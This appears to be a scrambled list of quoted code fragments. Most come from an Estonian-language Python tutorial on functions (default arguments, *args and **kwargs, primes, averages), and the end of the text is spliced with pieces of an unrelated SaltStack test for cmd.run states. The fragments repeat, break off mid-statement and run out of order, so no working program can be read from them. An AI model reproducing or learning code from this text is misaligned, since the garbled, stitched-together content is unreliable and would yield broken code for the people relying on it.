print(summa(1, 2)) # Saame vea, kuna", "# Õige tulemus print(keskmine(1, 2, 3, 4)) # Õige tulemus", "def summa(num1, num2, num3): return num1 + num2 + num3", "Funktsioonide ja protseduuride kasutamine \"\"\" # # Protseduur # def", "= 10, kw3 = 12, kw4 = 14) def argfun(arg1,", "(2 asemel 1.5) print(keskmine(1, 2, 3, 4)) # Õige tulemus", "def argfun(**kwargs): for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end =", "num2 # Ei saa kohe 4 arg'i kokku liita argumente", "arg2, *args, kw1, kw2) argfun(1, 2, 3, 4, 5, kw1", "print(numcount(1, 2, 3, \"4\")) print(numcount(1, None, 3, 4, 5)) print(\"-\"*30)", "list_primes() # # Muutuva arvu argumentidega funktsioonid # # Lisame", "method overloading) def summa(num1, num2): return num1 + num2 def", "2, 3, 4)) #print(summa(1, 2, 3, 4, 5)) # Selle", "isinstance(num, int) or isinstance(num, float): count += 1 return count", "# Saame vea, kuna uus funktsioon nõuab 3 argumenti #", "# Kutsume funktsiooni välja minu_funktsioon() # # Funktsioon # def", "argumenti # Katsetame funktsiooni ülelaadimist (function overloading või method overloading)", "5)) print(\"-\"*30) print(numavg(1)) print(numavg(1, 2)) print(numavg(1, 2, 3)) print(numavg(1, 2,", "1 return count def numavg(*numbrid): sum = numsum(*numbrid) count =", "isprime(n): print(f\"{n} ON algarv\") # Kasutame f-formaatimisstringi, mis lubab muutuja", "3, 0)) # Õige tulemus! print(keskmine(1, 0, 3, 2)) #", "def summa(numbrid=[]): sum = 0 for num in numbrid: sum", "for num in numbrid: sum += num return sum #print(summa(1))", "0 for num in numbrid: if isinstance(num, int) or isinstance(num,", "sort argumendid def argfun(arg1, arg2, *args, kw1 = 1, kw2", "# Isegi see variant töötab print(summa(1)) print(summa(1, 2)) arvud=[1, 2]", "int) or isinstance(num, float): count += 1 return count def", "print(summa(1, 2)) arvud=[1, 2] print(summa(*arvud)) # Ka siin tuleb '*'", "arg2, *args, kw1 = 1, kw2 = \"True\", **kwargs): print(arg1,", "= 10, kw2 = 12) def argfun(**kwargs): for (arg, val)", "tulemus (1.5 asemel 0.75) print(keskmine(1, 2, 3)) # Ka vale", "def kirjutab eelmise üle print(summa(1, 2, 3)) # Katsetame vaikeväärtustega", "2, 3, 4, 5] print(summa(*arvud)) arvud=[1] print(summa(*arvud)) # Erinevat sort", "sum = 0 for num in numbrid: if isinstance(num, int)", "None, 3, 4, 5)) print(\"-\"*30) print(numavg(1)) print(numavg(1, 2)) print(numavg(1, 2,", "num4 print(summa(1, 2)) print(summa(1, 2, 3)) print(summa(1, 2, 3, 4))", "not None: argumente += 1 sum = sum + num4", "num2, num3): return num1 + num2 + num3 print(summa(1, 2))", "+ num3 print(summa(1, 2, 3)) # Töötab print(summa(1, 2)) #", "2, 3)) # Katsetame vaikeväärtustega funktsioone def summa(num1, num2, num3", "argumente = 2.0 # Minimaalselt 2 if num3 > 0:", "sum = 0 for num in numbrid: sum += num", "õige on - kas tulemus sõltub argumentide järjekorrast? # Kasutame", "Töötab print(summa(1, 2)) # Saame vea, kuna uus funktsioon nõuab", "Õige tulemus!?! Kuidas see nüüd õige on - kas tulemus", "Proovime listiga argumente defineerida def summa(numbrid=[]): sum = 0 for", "= 0 for num in numbrid: sum += num return", "numbrid? def numsum(*numbrid): sum = 0 for num in numbrid:", "sum print(summa()) # Isegi see variant töötab print(summa(1)) print(summa(1, 2))", "end = ' ') print() argfun(1, 2, 3, 4, 5,", "print() list_primes() # # Muutuva arvu argumentidega funktsioonid # #", "3, 4, 5, kw1 = 10, kw2 = 12) def", "print(keskmine(1, 2)) # Ilmselgelt vale tulemus (1.5 asemel 0.75) print(keskmine(1,", "3, 4] print(summa(arvud)) print(summa([1, 2, 3, 4, 5])) # Võime", "num4) argumente = 4.0 return sum / argumente print(keskmine(1, 2))", "3)) # Ka vale tulemus (2 asemel 1.5) print(keskmine(1, 2,", "tulemus # Proovime listiga argumente defineerida def summa(numbrid=[]): sum =", "= argumente + 1 return sum / argumente print(keskmine(1, 2))", "argfun(arg1, arg2, *args, kw1 = 1, kw2 = \"True\", **kwargs):", "3, \"4\")) print(numsum(1, None, 3, 4, 5)) print(\"-\"*30) print(numcount(1)) print(numcount(1,", "num1 + num2 + num3 print(summa(1, 2)) # Saame vea,", "vahemuutujata arvud=[1] print(summa(arvud)) def summa(*numbrid): sum = 0 for num", "tulemus (2 asemel 1.5) print(keskmine(1, 2, 3, 4)) # Õige", "1, kw2 = \"True\"): print(arg1, arg2, *args, kw1, kw2) argfun(1,", "(arg, val) in kwargs.items(): print(f\"{arg}={val}\", end = ' ') print()", "4 arg'i kokku liita argumente = 2.0 # Minimaalselt 2", "12, kw4 = 14) # Kuidas garanteerida, et argumentideks on", "num4 = 0): sum = num1 + num2 + num3", "14) def argfun(arg1, arg2, *args, **kwargs): print(arg1, arg2, *args) for", "> 0: argumente = argumente + 1 if num4 >", "argumentideks on numbrid? def numsum(*numbrid): sum = 0 for num", "float): count += 1 return count def numavg(*numbrid): sum =", "2, 3, 4] print(summa(arvud)) print(summa([1, 2, 3, 4, 5])) #", "4, 5, kw1 = 10, kw2 = 12) def argfun(**kwargs):", "funktsiooni testimiseks välja n = 5 if isprime(n): print(f\"{n} ON", "Funktsioon # def liida(num1, num2): return num1 + num2 sum", "num2 + num3 print(summa(1, 2, 3)) # Töötab print(summa(1, 2))", "3, 2)) # Õige tulemus!?! Kuidas see nüüd õige on", "print(summa(1)) print(summa(1, 2)) arvud=[1, 2] print(summa(*arvud)) # Ka siin tuleb", "or isinstance(num, float): sum += num return sum def numcount(*numbrid):", "numbrid: sum += num return sum print(summa()) # Isegi see", "print(summa(1, 2, 3)) # Katsetame vaikeväärtustega funktsioone def summa(num1, num2,", "def keskmine(num1, num2, num3 = 0, num4 = 0): sum", "print(arg1, arg2, *args, kw1, kw2) for (arg, val) in kwargs.items():", "3)) # Töötab print(summa(1, 2)) # Saame vea, kuna uus", "def numsum(*numbrid): sum = 0 for num in numbrid: if", "siin tuleb '*' kasutada arvud=[1, 2, 3] print(summa(*arvud)) arvud=[1, 2,", "4, 5, kw2 = 10, kw3 = 12, kw4 =", "\"\"\" # # Protseduur # def minu_funktsioon(): print(\"See on protseduur\")", "num1 + num2 # Ei saa kohe 4 arg'i kokku", "float tüübiks print(numsum(1)) print(numsum(1, 2)) print(numsum(1, 2, 3)) print(numsum(1, 2,", "funk() # Kutsume funktsiooni välja ilma argumente kaasa andmata #", "Võime panna ka ilma vahemuutujata arvud=[1] print(summa(arvud)) def summa(*numbrid): sum", "4)) # Õige tulemus # Täiendame argumentide arvu leidmist def", "tulemus # Täiendame argumentide arvu leidmist def keskmine(num1, num2, num3", "Kuidas garanteerida, et argumentideks on numbrid? def numsum(*numbrid): sum =", "pass def funk(arg1 = 0, arg2 = \"Test\"): print(arg1, arg2)", "def argfun(arg1, arg2, *args, kw1 = 1, kw2 = \"True\"):", "Ei saa kohe 4 arg'i kokku liita argumente = 2.0", "print(numcount(1, 2)) print(numcount(1, 2, 3)) print(numcount(1, 2, 3, \"4\")) print(numcount(1,", "num3 = 0, num4 = 0): return num1 + num2", "argumentide järjekorrast? # Kasutame teistsugust vaikeväärtust def keskmine(num1, num2, num3", "i == 0: return False else: return True # Kustume", "= num1 + num2 + num3 + num4 # Sama,", "+= 1 sum = sum + num4 return sum /", "sum def numcount(*numbrid): count = 0 for num in numbrid:", "vea, kuna uus funktsioon nõuab 3 argumenti # Katsetame funktsiooni", "num3, num4) argumente = 2.0 # Minimaalselt 2 if num3", "arvud=[1, 2, 3, 4, 5] print(summa(*arvud)) arvud=[1] print(summa(*arvud)) # Erinevat", "isinstance(num, float): count += 1 return count def numavg(*numbrid): sum", "num1 + num2 def summa(num1, num2, num3): return num1 +", "arvud=[1] print(summa(*arvud)) # Erinevat sort argumendid def argfun(arg1, arg2, *args,", "sum / (count * 1.0) # Võime jagatava teha float", "kw1, kw2) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end =", "count = numcount(*numbrid) return sum / (count * 1.0) #", "2, 3, \"4\")) print(numsum(1, None, 3, 4, 5)) print(\"-\"*30) print(numcount(1))", "True # Kustume funktsiooni testimiseks välja n = 5 if", "# Ilmselgelt vale tulemus (1.5 asemel 0.75) print(keskmine(1, 2, 3))", "kw4 = 14) def argfun(arg1, arg2, *args, kw1 = 1,", "print(\"-\"*30) print(numcount(1)) print(numcount(1, 2)) print(numcount(1, 2, 3)) print(numcount(1, 2, 3,", "3, 0)) # Vale tulemus! print(keskmine(1, 0, 3, 2)) #", "*args, kw1, kw2) argfun(1, 2, 3, 4, 5, kw1 =", "count def numavg(*numbrid): sum = numsum(*numbrid) count = numcount(*numbrid) return", "Kutsume funktsiooni välja minu_funktsioon() # # Funktsioon # def liida(num1,", "+ num2 # Ei saa kohe 4 arg'i kokku liita", "arg2 = väärtus2) # pass def funk(arg1 = 0, arg2", "4.0 return sum / argumente print(keskmine(1, 2)) # Ilmselgelt vale", "# Proovime listiga argumente defineerida def summa(numbrid=[]): sum = 0", "pole massiiv arvud=[1, 2] print(summa(arvud)) arvud=[1, 2, 3] print(summa(arvud)) arvud=[1,", "12) def argfun(**kwargs): for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end", "0.75) print(keskmine(1, 2, 3)) # Ka vale tulemus (2 asemel", "range(2, max_num): if isprime(n): print(n, end = ' ', flush", "None: argumente += 1 sum = sum + num3 if", "Kutsume funktsiooni välja ilma argumente kaasa andmata # # Algarvude", "n % i == 0: return False else: return True", "2, 3] print(summa(arvud)) arvud=[1, 2, 3, 4] print(summa(arvud)) print(summa([1, 2,", "lihtsalt uusi argumente def summa(num1, num2, num3): return num1 +", "3, 4, 5)) print(\"-\"*30) print(numavg(1)) print(numavg(1, 2)) print(numavg(1, 2, 3))", "funktsiooni välja ilma argumente kaasa andmata # # Algarvude leidmine", "print(numavg(1, 2)) print(numavg(1, 2, 3)) print(numavg(1, 2, 3, \"4\")) print(numavg(1,", "kw2 = 10, kw3 = 12, kw4 = 14) #", "#print(summa(1, 2)) # Ei tööta, kuna pole massiiv arvud=[1, 2]", "= 12, kw4 = 14) # Kuidas garanteerida, et argumentideks", "print(summa(arvud)) arvud=[1, 2, 3, 4] print(summa(arvud)) print(summa([1, 2, 3, 4,", "= 0, arg2 = \"Test\"): print(arg1, arg2) funk() # Kutsume", "# Sama, mis summa(num1, num2, num3, num4) argumente = 2.0", "2] print(summa(*arvud)) # Ka siin tuleb '*' kasutada arvud=[1, 2,", "# Näide vaikeväärtuste kasutamisest # def funk(arg1 = väärtus1, arg2", "= 2.0 # Minimaalselt 2 if num3 > 0: argumente", "+ num2 + num3 print(summa(1, 2, 3)) # Töötab print(summa(1,", "in numbrid: if isinstance(num, int) or isinstance(num, float): sum +=", "isinstance(num, int) or isinstance(num, float): sum += num return sum", "= sum + num3 if num4 is not None: argumente", "n <= 1: return False for i in range(2, n):", "sum = numsum(*numbrid) count = numcount(*numbrid) return sum / (count", "vale tulemus (2 asemel 1.5) print(keskmine(1, 2, 3, 4)) #", "sum = num1 + num2 # Ei saa kohe 4", "return num1 + num2 + num3 + num4 print(summa(1, 2))", "if num3 > 0: argumente = argumente + 1 if", "vaikeväärtuste kasutamisest # def funk(arg1 = väärtus1, arg2 = väärtus2)", "3)) # Õige tulemus print(keskmine(1, 2, 3, 4)) # Õige", "in numbrid: if isinstance(num, int) or isinstance(num, float): count +=", "keskmine(num1, num2, num3 = 0, num4 = 0): sum =", "= 0, num4 = 0): sum = num1 + num2", "3, 4, 5)) print(numavg()) # Viga! Nulliga jagamine!!! # Vigade", "return False else: return True # Kustume funktsiooni testimiseks välja", "# Õige tulemus! print(keskmine(1, 0, 3, 2)) # Õige tulemus", "arg2, *args, kw1, kw2) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\",", "2, 3, 4, 5, kw2 = 10, kw3 = 12,", "# Katsetame funktsiooni ülelaadimist (function overloading või method overloading) def", "= True) print() list_primes() # # Muutuva arvu argumentidega funktsioonid", "tulemus!?! Kuidas see nüüd õige on - kas tulemus sõltub", "\"\"\" funktsioonid.py Funktsioonide ja protseduuride kasutamine \"\"\" # # Protseduur", "*args) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end = '", "+ num3 + num4 print(summa(1, 2)) print(summa(1, 2, 3)) print(summa(1,", "if num4 is not None: argumente += 1 sum =", "True) print() list_primes() # # Muutuva arvu argumentidega funktsioonid #", "> 0: argumente = argumente + 1 return sum /", "keskmine(num1, num2, num3 = None, num4 = None): sum =", "print(numavg(1)) print(numavg(1, 2)) print(numavg(1, 2, 3)) print(numavg(1, 2, 3, \"4\"))", "isprime(n): if n <= 1: return False for i in", "i in range(2, n): if n % i == 0:", "+ num2 def summa(num1, num2, num3): return num1 + num2", "# Õige tulemus # Täiendame argumentide arvu leidmist def keskmine(num1,", "print(summa(*arvud)) # Erinevat sort argumendid def argfun(arg1, arg2, *args, kw1", "print(f\"{arg}={val}\", end = ' ') print() argfun(1, 2, 3, 4,", "1.5) print(keskmine(1, 2, 3, 4)) # Õige tulemus # Täiendame", "12, kw4 = 14) def argfun(arg1, arg2, *args, kw1 =", "print() argfun(kw2 = 10, kw3 = 12, kw4 = 14)", "print(numcount(1)) print(numcount(1, 2)) print(numcount(1, 2, 3)) print(numcount(1, 2, 3, \"4\"))", "argumente = argumente + 1 if num4 > 0: argumente", "2, 3, \"4\")) print(numavg(1, None, 3, 4, 5)) print(numavg()) #", "4, 5])) # Võime panna ka ilma vahemuutujata arvud=[1] print(summa(arvud))", "Võime jagatava teha float tüübiks print(numsum(1)) print(numsum(1, 2)) print(numsum(1, 2,", "num2, num3 = 0, num4 = 0): return num1 +", "4] print(summa(*arvud)) arvud=[1, 2, 3, 4, 5] print(summa(*arvud)) arvud=[1] print(summa(*arvud))", "ka ilma vahemuutujata arvud=[1] print(summa(arvud)) def summa(*numbrid): sum = 0", "eelmise üle print(summa(1, 2, 3)) # Katsetame vaikeväärtustega funktsioone def", "2)) print(numsum(1, 2, 3)) print(numsum(1, 2, 3, \"4\")) print(numsum(1, None,", "# Õige tulemus!?! Kuidas see nüüd õige on - kas", "arg2, *args) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end =", "n = 5 if isprime(n): print(f\"{n} ON algarv\") # Kasutame", "+ 1 if num4 > 0: argumente = argumente +", "järjekorrast? # Kasutame teistsugust vaikeväärtust def keskmine(num1, num2, num3 =", "välja minu_funktsioon() # # Funktsioon # def liida(num1, num2): return", "val) in kwargs.items(): print(f\"{arg}={val}\", end = ' ') print() argfun(1,", "kuna uus funktsioon nõuab 3 argumenti # Katsetame funktsiooni ülelaadimist", "print(summa(1, 2)) # Saame vea, kuna uus funktsioon nõuab 3", "+ num2 + num3 + num4 print(summa(1, 2)) print(summa(1, 2,", "+ num2 + num3 print(summa(1, 2)) # Saame vea, kuna", "asemel 0.75) print(keskmine(1, 2, 3)) # Ka vale tulemus (2", "töötab print(summa(1)) print(summa(1, 2)) arvud=[1, 2] print(summa(*arvud)) # Ka siin", "3] print(summa(arvud)) arvud=[1, 2, 3, 4] print(summa(arvud)) print(summa([1, 2, 3,", "= 12, kw4 = 14) def argfun(arg1, arg2, *args, **kwargs):", "4] print(summa(arvud)) print(summa([1, 2, 3, 4, 5])) # Võime panna", "2, 3, 4, 5)) # Selle tööle saamiseks peame f-ni", "ilma vahemuutujata arvud=[1] print(summa(arvud)) def summa(*numbrid): sum = 0 for", "\"Test\"): print(arg1, arg2) funk() # Kutsume funktsiooni välja ilma argumente", "funktsioonid # # Lisame lihtsalt uusi argumente def summa(num1, num2,", "5)) print(\"-\"*30) print(numcount(1)) print(numcount(1, 2)) print(numcount(1, 2, 3)) print(numcount(1, 2,", "tulemus print(keskmine(1, 2, 3, 0)) # Õige tulemus! print(keskmine(1, 0,", "Saame vea, kuna uus funktsioon nõuab 3 argumenti # Katsetame", "12, kw4 = 14) def argfun(arg1, arg2, *args, **kwargs): print(arg1,", "saa kohe 4 arg'i kokku liita argumente = 2.0 #", "# # Muutuva arvu argumentidega funktsioonid # # Lisame lihtsalt", "= 5 if isprime(n): print(f\"{n} ON algarv\") # Kasutame f-formaatimisstringi,", "Isegi see variant töötab print(summa(1)) print(summa(1, 2)) arvud=[1, 2] print(summa(*arvud))", "sum += num return sum def numcount(*numbrid): count = 0", "return False for i in range(2, n): if n %", "ON algarv\") # Kasutame f-formaatimisstringi, mis lubab muutuja otse stringi", "argumente = argumente + 1 return sum / argumente print(keskmine(1,", "3, 4)) #print(summa(1, 2, 3, 4, 5)) # Selle tööle", "num4 # Sama, mis summa(num1, num2, num3, num4) argumente =", "None, 3, 4, 5)) print(\"-\"*30) print(numcount(1)) print(numcount(1, 2)) print(numcount(1, 2,", "3, 4] print(summa(*arvud)) arvud=[1, 2, 3, 4, 5] print(summa(*arvud)) arvud=[1]", "* 1.0) # Võime jagatava teha float tüübiks print(numsum(1)) print(numsum(1,", "= väärtus2) # pass def funk(arg1 = 0, arg2 =", "list_primes(max_num = 100): for n in range(2, max_num): if isprime(n):", "see variant töötab print(summa(1)) print(summa(1, 2)) arvud=[1, 2] print(summa(*arvud)) #", "0: return False else: return True # Kustume funktsiooni testimiseks", "in kwargs.items(): print(f\"{arg}={val}\", end = ' ') print() argfun(1, 2,", "5, kw2 = 10, kw3 = 12, kw4 = 14)", "Selle tööle saamiseks peame f-ni muutma def keskmine(num1, num2, num3", "'*' kasutada arvud=[1, 2, 3] print(summa(*arvud)) arvud=[1, 2, 3, 4]", "summa(numbrid=[]): sum = 0 for num in numbrid: sum +=", "# Katsetame vaikeväärtustega funktsioone def summa(num1, num2, num3 = 0,", "\"4\")) print(numsum(1, None, 3, 4, 5)) print(\"-\"*30) print(numcount(1)) print(numcount(1, 2))", "2, 3)) print(numsum(1, 2, 3, \"4\")) print(numsum(1, None, 3, 4,", "overloading või method overloading) def summa(num1, num2): return num1 +", "argumentidega funktsioonid # # Lisame lihtsalt uusi argumente def summa(num1,", "+ 1 return sum / argumente print(keskmine(1, 2)) # Õige", "num2): return num1 + num2 def summa(num1, num2, num3): return", "3, 4, 5, kw2 = 10, kw3 = 12, kw4", "# Õige tulemus print(keskmine(1, 2, 3)) # Õige tulemus print(keskmine(1,", "= 100): for n in range(2, max_num): if isprime(n): print(n,", "Sama, mis summa(num1, num2, num3, num4) argumente = 4.0 return", "def numcount(*numbrid): count = 0 for num in numbrid: if", "arg2 = \"Test\"): print(arg1, arg2) funk() # Kutsume funktsiooni välja", "Lisame lihtsalt uusi argumente def summa(num1, num2, num3): return num1", "num2, num3, num4) argumente = 4.0 return sum / argumente", "print(summa(1, 2)) print(summa(1, 2, 3)) print(summa(1, 2, 3, 4)) #print(summa(1,", "mis summa(num1, num2, num3, num4) argumente = 2.0 # Minimaalselt", "arvud=[1] print(summa(arvud)) def summa(*numbrid): sum = 0 for num in", "14) # Kuidas garanteerida, et argumentideks on numbrid? def numsum(*numbrid):", "arvud=[1, 2, 3, 4] print(summa(arvud)) print(summa([1, 2, 3, 4, 5]))", "sum #print(summa(1)) # Ei tööta, kuna pole itereeritav tüüp #print(summa(1,", "arg2, *args, kw1 = 1, kw2 = \"True\"): print(arg1, arg2,", "Vale tulemus! print(keskmine(1, 0, 3, 2)) # Õige tulemus!?! Kuidas", "print(numsum(1, 2)) print(numsum(1, 2, 3)) print(numsum(1, 2, 3, \"4\")) print(numsum(1,", "print(numsum(1, None, 3, 4, 5)) print(\"-\"*30) print(numcount(1)) print(numcount(1, 2)) print(numcount(1,", "# Ei tööta, kuna pole massiiv arvud=[1, 2] print(summa(arvud)) arvud=[1,", "print(f\"{n} EI OLE algarv\") def list_primes(max_num = 100): for n", "print(numavg(1, None, 3, 4, 5)) print(numavg()) # Viga! Nulliga jagamine!!!", "sum = num1 + num2 + num3 + num4 #", "if isprime(n): print(n, end = ' ', flush = True)", "on protseduur\") # Kutsume funktsiooni välja minu_funktsioon() # # Funktsioon", "None): sum = num1 + num2 # Ei saa kohe", "= ' ') print() argfun(1, 2, 3, 4, 5, kw2", "num4 = None): sum = num1 + num2 # Ei", "= numcount(*numbrid) return sum / (count * 1.0) # Võime", "0, num4 = 0): return num1 + num2 + num3", "2] print(summa(arvud)) arvud=[1, 2, 3] print(summa(arvud)) arvud=[1, 2, 3, 4]", "if isprime(n): print(f\"{n} ON algarv\") # Kasutame f-formaatimisstringi, mis lubab", "argfun(**kwargs): for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end = '", "kw2) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end = '", "numbrid: if isinstance(num, int) or isinstance(num, float): count += 1", "leidmine # def isprime(n): if n <= 1: return False", "def keskmine(num1, num2, num3 = None, num4 = None): sum", "argfun(1, 2, 3, 4, 5, kw1 = 10, kw2 =", "garanteerida, et argumentideks on numbrid? def numsum(*numbrid): sum = 0", "*args, kw1 = 1, kw2 = \"True\", **kwargs): print(arg1, arg2,", "print(numcount(1, None, 3, 4, 5)) print(\"-\"*30) print(numavg(1)) print(numavg(1, 2)) print(numavg(1,", "Näide vaikeväärtuste kasutamisest # def funk(arg1 = väärtus1, arg2 =", "nüüd õige on - kas tulemus sõltub argumentide järjekorrast? #", "3 argumenti # Katsetame funktsiooni ülelaadimist (function overloading või method", "kw3 = 12, kw4 = 14) # Kuidas garanteerida, et", "EI OLE algarv\") def list_primes(max_num = 100): for n in", "listiga argumente defineerida def summa(numbrid=[]): sum = 0 for num", "for num in numbrid: sum += num return sum print(summa())", "print(summa([1, 2, 3, 4, 5])) # Võime panna ka ilma", "3, 4, 5])) # Võime panna ka ilma vahemuutujata arvud=[1]", "4)) # Õige tulemus print(keskmine(1, 2, 3, 0)) # Õige", "3, 2)) # Õige tulemus # Proovime listiga argumente defineerida", "funk(arg1 = 0, arg2 = \"Test\"): print(arg1, arg2) funk() #", "või method overloading) def summa(num1, num2): return num1 + num2", "0)) # Vale tulemus! print(keskmine(1, 0, 3, 2)) # Õige", "arvud=[1, 2] print(summa(*arvud)) # Ka siin tuleb '*' kasutada arvud=[1,", "funktsiooni ülelaadimist (function overloading või method overloading) def summa(num1, num2):", "print(summa(*arvud)) arvud=[1, 2, 3, 4, 5] print(summa(*arvud)) arvud=[1] print(summa(*arvud)) #", "0, 3, 2)) # Õige tulemus # Proovime listiga argumente", "muutma def keskmine(num1, num2, num3 = 0, num4 = 0):", "defineerida def summa(numbrid=[]): sum = 0 for num in numbrid:", "+= num return sum def numcount(*numbrid): count = 0 for", "kasutamine \"\"\" # # Protseduur # def minu_funktsioon(): print(\"See on", "100): for n in range(2, max_num): if isprime(n): print(n, end", "kw4 = 14) def argfun(arg1, arg2, *args, **kwargs): print(arg1, arg2,", "Minimaalselt 2 if num3 > 0: argumente = argumente +", "2)) # Õige tulemus print(keskmine(1, 2, 3)) # Õige tulemus", "print(numsum(1, 2, 3, \"4\")) print(numsum(1, None, 3, 4, 5)) print(\"-\"*30)", "# Algarvude leidmine # def isprime(n): if n <= 1:", "# Õige tulemus print(keskmine(1, 2, 3, 0)) # Õige tulemus!", "Ka siin tuleb '*' kasutada arvud=[1, 2, 3] print(summa(*arvud)) arvud=[1,", "(1.5 asemel 0.75) print(keskmine(1, 2, 3)) # Ka vale tulemus", "else: print(f\"{n} EI OLE algarv\") def list_primes(max_num = 100): for", "print(summa(*arvud)) arvud=[1, 2, 3, 4] print(summa(*arvud)) arvud=[1, 2, 3, 4,", "== 0: return False else: return True # Kustume funktsiooni", "<= 1: return False for i in range(2, n): if", "Ka vale tulemus (2 asemel 1.5) print(keskmine(1, 2, 3, 4))", "sõltub argumentide järjekorrast? # Kasutame teistsugust vaikeväärtust def keskmine(num1, num2,", "= 12) def argfun(**kwargs): for (arg, val) in kwargs.items(): print(f\"{arg}={val}\",", "= numsum(*numbrid) count = numcount(*numbrid) return sum / (count *", "# Ei saa kohe 4 arg'i kokku liita argumente =", "minu_funktsioon(): print(\"See on protseduur\") # Kutsume funktsiooni välja minu_funktsioon() #", "välja ilma argumente kaasa andmata # # Algarvude leidmine #", "otse stringi sisse panna else: print(f\"{n} EI OLE algarv\") def", "print(numavg()) # Viga! Nulliga jagamine!!! # Vigade haldamist vaatame peatselt", "f-ni muutma def keskmine(num1, num2, num3 = 0, num4 =", "0): return num1 + num2 + num3 + num4 print(summa(1,", "kuna viimane def kirjutab eelmise üle print(summa(1, 2, 3)) #", "argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 =", "arvud=[1, 2, 3, 4] print(summa(*arvud)) arvud=[1, 2, 3, 4, 5]", "kas tulemus sõltub argumentide järjekorrast? # Kasutame teistsugust vaikeväärtust def", "0)) # Õige tulemus! print(keskmine(1, 0, 3, 2)) # Õige", "kw4 = 14) # Kuidas garanteerida, et argumentideks on numbrid?", "argumendid def argfun(arg1, arg2, *args, kw1 = 1, kw2 =", "3, \"4\")) print(numcount(1, None, 3, 4, 5)) print(\"-\"*30) print(numavg(1)) print(numavg(1,", "3)) print(summa(1, 2, 3, 4)) #print(summa(1, 2, 3, 4, 5))", "summa(num1, num2, num3 = 0, num4 = 0): return num1", "num1 + num2 sum = liida(3, 5) print(sum) # Näide", "(function overloading või method overloading) def summa(num1, num2): return num1", "return sum / argumente print(keskmine(1, 2)) # Õige tulemus print(keskmine(1,", "num3 + num4 print(summa(1, 2)) print(summa(1, 2, 3)) print(summa(1, 2,", "kaasa andmata # # Algarvude leidmine # def isprime(n): if", "tulemus print(keskmine(1, 2, 3)) # Õige tulemus print(keskmine(1, 2, 3,", "print(keskmine(1, 2, 3)) # Õige tulemus print(keskmine(1, 2, 3, 4))", "end = ' ') print() argfun(kw2 = 10, kw3 =", "or isinstance(num, float): count += 1 return count def numavg(*numbrid):", "0, num4 = 0): sum = num1 + num2 +", "kw2) argfun(1, 2, 3, 4, 5, kw1 = 10, kw2", "print(summa(1, 2)) # Saame vea, kuna viimane def kirjutab eelmise", "print(keskmine(1, 2)) # Õige tulemus print(keskmine(1, 2, 3)) # Õige", "uusi argumente def summa(num1, num2, num3): return num1 + num2", "def summa(*numbrid): sum = 0 for num in numbrid: sum", "0: argumente = argumente + 1 return sum / argumente", "Õige tulemus print(keskmine(1, 2, 3)) # Õige tulemus print(keskmine(1, 2,", "\"4\")) print(numavg(1, None, 3, 4, 5)) print(numavg()) # Viga! Nulliga", "num3 > 0: argumente = argumente + 1 if num4", "tulemus print(keskmine(1, 2, 3, 4)) # Õige tulemus print(keskmine(1, 2,", "False for i in range(2, n): if n % i", "#print(summa(1, 2, 3, 4, 5)) # Selle tööle saamiseks peame", "*args, kw1, kw2) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end", "else: return True # Kustume funktsiooni testimiseks välja n =", "5)) # Selle tööle saamiseks peame f-ni muutma def keskmine(num1,", "+ num4 return sum / argumente print(keskmine(1, 2)) # Õige", "(count * 1.0) # Võime jagatava teha float tüübiks print(numsum(1))", "num2, num3 = None, num4 = None): sum = num1", "range(2, n): if n % i == 0: return False", "mis lubab muutuja otse stringi sisse panna else: print(f\"{n} EI", "ülelaadimist (function overloading või method overloading) def summa(num1, num2): return", "kwargs.items(): print(f\"{arg}={val}\", end = ' ') print() argfun(kw2 = 10,", "**kwargs): print(arg1, arg2, *args, kw1, kw2) for (arg, val) in", "= liida(3, 5) print(sum) # Näide vaikeväärtuste kasutamisest # def", "print(sum) # Näide vaikeväärtuste kasutamisest # def funk(arg1 = väärtus1,", "2, 3, 0)) # Õige tulemus! print(keskmine(1, 0, 3, 2))", "5 if isprime(n): print(f\"{n} ON algarv\") # Kasutame f-formaatimisstringi, mis", "lubab muutuja otse stringi sisse panna else: print(f\"{n} EI OLE", "Kasutame teistsugust vaikeväärtust def keskmine(num1, num2, num3 = None, num4", "numavg(*numbrid): sum = numsum(*numbrid) count = numcount(*numbrid) return sum /", "argumente + 1 if num4 > 0: argumente = argumente", "vaikeväärtustega funktsioone def summa(num1, num2, num3 = 0, num4 =", "Katsetame funktsiooni ülelaadimist (function overloading või method overloading) def summa(num1,", "saamiseks peame f-ni muutma def keskmine(num1, num2, num3 = 0,", "algarv\") # Kasutame f-formaatimisstringi, mis lubab muutuja otse stringi sisse", "num3): return num1 + num2 + num3 print(summa(1, 2, 3))", "kw3 = 12, kw4 = 14) def argfun(arg1, arg2, *args,", "summa(num1, num2, num3, num4) argumente = 2.0 # Minimaalselt 2", "argumentide arvu leidmist def keskmine(num1, num2, num3 = 0, num4", "print(n, end = ' ', flush = True) print() list_primes()", "def list_primes(max_num = 100): for n in range(2, max_num): if", "1 sum = sum + num3 if num4 is not", "4, 5)) print(\"-\"*30) print(numcount(1)) print(numcount(1, 2)) print(numcount(1, 2, 3)) print(numcount(1,", "arvu leidmist def keskmine(num1, num2, num3 = 0, num4 =" ]
[ "comment here to make sure the comment reads that the", "of run_watch ''' def setUp(self): self.state_name = 'run_watch' state_filename =", "\"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run", "'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w')", "= tempfile.mkstemp() try: os.close(fd) except OSError as exc: if exc.errno", "self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface ''' ret =", "tempfile.mkstemp() try: os.close(fd) except OSError as exc: if exc.errno !=", "'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_:", "We must assert against the comment here to make sure", "def setUp(self): self.state_name = 'run_watch' state_filename = self.state_name + '.sls'", "exc: if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def", "self.assertTrue(ret[state_key]['result']) 